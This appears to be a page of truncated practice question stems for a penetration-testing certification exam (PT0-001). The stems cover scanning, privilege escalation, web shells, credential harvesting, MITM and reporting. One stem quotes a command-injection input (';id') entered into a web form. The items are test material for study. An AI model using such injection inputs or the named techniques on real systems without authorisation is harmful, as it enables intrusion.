PT0-001 Practice Questions

Which of the following can be used to perform online password attacks against RDP?

A company received a report with the following finding While on the internal network the penetration tester was able to successfully capture SMB broadcasted user ID and password in...

Which of the following actions BEST matches a script kiddie's threat actor?

A penetration tester has compromised a system and wishes to connect to a port on it from the attacking machine to control the system Which of the following commands should the test...

An organization has requested that a penetration test be performed to determine if it is possible for an attacker to gain a foothold on the organization's server segment During the...

A penetration tester has obtained access to an IP network subnet that contains ICS equipment intercommunication. Which of the following attacks is MOST likely to succeed in creatin...

Which of the following BEST describes the difference between a red team engagement and a penetration test?

A penetration tester is performing a remote internal penetration test by connecting to the testing system from the Internet via a reverse SSH tunnel. The testing system has been pl...

While performing privilege escalation on a Windows 7 workstation, a penetration tester identifies a service that imports a DLL by name rather than an absolute path. To exploit this...

The scope of a penetration test requires the tester to be stealthy when performing port scans. Which of the following commands with Nmap BEST supports stealthy scanning?

During a physical security review, a detailed penetration testing report was obtained, which was issued to a security analyst and then discarded in the trash. The report contains v...

A penetration tester is performing a black-box test of a client web application, and the scan host is unable to access it. The client has sent screenshots showing the system is fun...

A penetration tester ran an Nmap scan against a target and received the following output: Which of the following commands would be best for the penetration tester to execute NEXT t...

A penetration tester needs to provide the code used to exploit a DNS server in the final report. In which of the following parts of the report should the penetration tester place t...

A client needs to be PCI compliant and has external-facing web servers. Which of the following CVSS vulnerability scores would automatically bring the client out of compliance stan...

A MITM attack is being planned. The first step is to get information flowing through a controlled device. Which of the following should be used to accomplish this?

During a vulnerability assessment, the security consultant finds an XP legacy system that is running a criticalmbusiness function. Which of the following mitigations is BEST for th...

A penetration tester is performing a wireless penetration test. Which of the following are some vulnerabilities that might allow the penetration tester to easily and quickly access...

A penetration tester has successfully exploited a Windows host with low privileges and found directories with the following permissions: Which of the following should be performed...

A penetration tester has discovered through automated scanning that a Tomcat server allows for the use of default credentials. Using default credentials, the tester is able to uplo...

A penetration tester used an ASP.NET web shell to gain access to a web application, which allowed the tester to pivot in the corporate network. Which of the following is the MOST i...

A penetration tester is planning to conduct a distributed dictionary attack on a government domain against the login portal. The tester will leverage multiple proxies to mask the o...

A client's systems administrator requests a copy of the report from the penetration tester, but the systems administrator is not listed as a point of contact or signatory. Which of...

At the information gathering stage, a penetration tester is trying to passively identify the technology running on a client's website. Which of the following approached should the...

Which of the following BEST protects against a rainbow table attack?

A penetration tester is assessing the security of a web form for a client and enters ";id" in one of the fields. The penetration tester observes the following response: Based on th...

A penetration tester is connected to a client's local network and wants to passively identify cleartext protocols and potentially sensitive data being communicated across the netwo...

A penetration tester directly connects to an internal network. Which of the following exploits would work BEST for quick lateral movement within an internal network?

A penetration tester runs the following on a machine: Which of the following will be returned?

A penetration tester discovers an anonymous FTP server that is sharing the C:\drive. Which of the following is the BEST exploit?

Which of the following is the MOST comprehensive type of penetration test on a network?

An attacker performed a MITM attack against a mobile application. The attacker is attempting to manipulate the application's network traffic via a proxy tool. The attacker only see...

A company decides to remediate issues identified from a third-party penetration test done to its infrastructure. Management should instruct the IT team to:

A penetration tester successfully exploits a system, receiving a reverse shell. Which of the following is a Meterpreter command that is used to harvest locally stored credentials?

A penetration tester is testing a web application and is logged in as a lower-privileged user. The tester runs arbitrary JavaScript within an application, which sends an XMLHttpReq...

During the exploitation phase of a penetration test, a vulnerability is discovered that allows command execution on a Linux web server. A cursory review confirms the system access...

During an engagement, a consultant identifies a number of areas that need further investigation and require an extension of the engagement. Which of the following is the MOST likel...

A penetration tester has been hired to perform a penetration test for an organization. Which of the following is indicative of an error-based SQL injection attack?

When negotiating a penetration testing contract with a prospective client, which of the following disclaimers should be included in order to mitigate liability in case of a future...

A tester was able to retrieve domain users' hashes. Which of the following tools can be used to uncover the users' passwords? (Choose two.)

A penetration tester is attempting to open a socket in a bash script but receives errors when running it. The current state of the relevant line in the script is as follows: Which...

A vulnerability scan report shows what appears to be evidence of a memory disclosure vulnerability on one of the target hosts. The administrator claims the system is patched and th...

A penetration tester has gained physical access to a facility and connected directly into the internal network. The penetration tester now wants to pivot into the server VLAN. Whic...

During an engagement an unsecure direct object reference vulnerability was discovered that allows the extraction of highly sensitive PII. The tester is required to extract and then...

A security team is switching firewall vendors. The director of security wants to scope a penetration test to satisfy requirements to perform the test after major architectural chan...

A penetration tester has identified a directory traversal vulnerability. Which of the following payloads could have helped the penetration tester identify this vulnerability?

An individual has been hired by an organization after passing a background check. The individual has been passing information to a competitor over a period of time. Which of the fo...

A senior employee received a suspicious email from another executive requesting an urgent wire transfer. Which of the following types of attacks is likely occurring?